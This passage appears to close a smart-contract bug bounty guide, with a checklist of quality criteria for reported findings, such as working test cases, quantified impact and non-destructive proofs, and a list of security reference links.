- All findings have working Foundry/Hardhat test cases
- Economic impact is quantified (not just "could lose funds")
- No false positives from automated tools
- Reports follow platform-specific format (Immunefi, Arkham, etc.)
- Findings include specific code fixes
- Exploit is non-destructive (demonstrates vulnerability without draining funds)
- Cross-chain effects considered
- Flash loan requirements documented

## References

- [Immunefi Bug Bounty Standard](https://immunefi.com/bug-bounty/)
- [SWC Registry](https://swcregistry.io/) — Smart Contract Weakness Classification
- [Trail of Bits: Not All Bugs Are Created Equal](https://blog.trailofbits.com/)
- [Consensys Best Practices](https://consensys.github.io/smart-contract-best-practices/)
- [Solidity by Example](https://solidity-by-example.org/)
- [Foundry Book](https://book.getfoundry.sh/)
- [DeFi Hack Labs](https://github.com/SunWeb3Sec/DeFiHackLabs)
- [Smart Contract Security Best Practices](https://consensys.github.io/smart-contract-best-practices/)
- [OpenZeppelin Security](https://docs.openzeppelin.com/learn/security-best-practices)
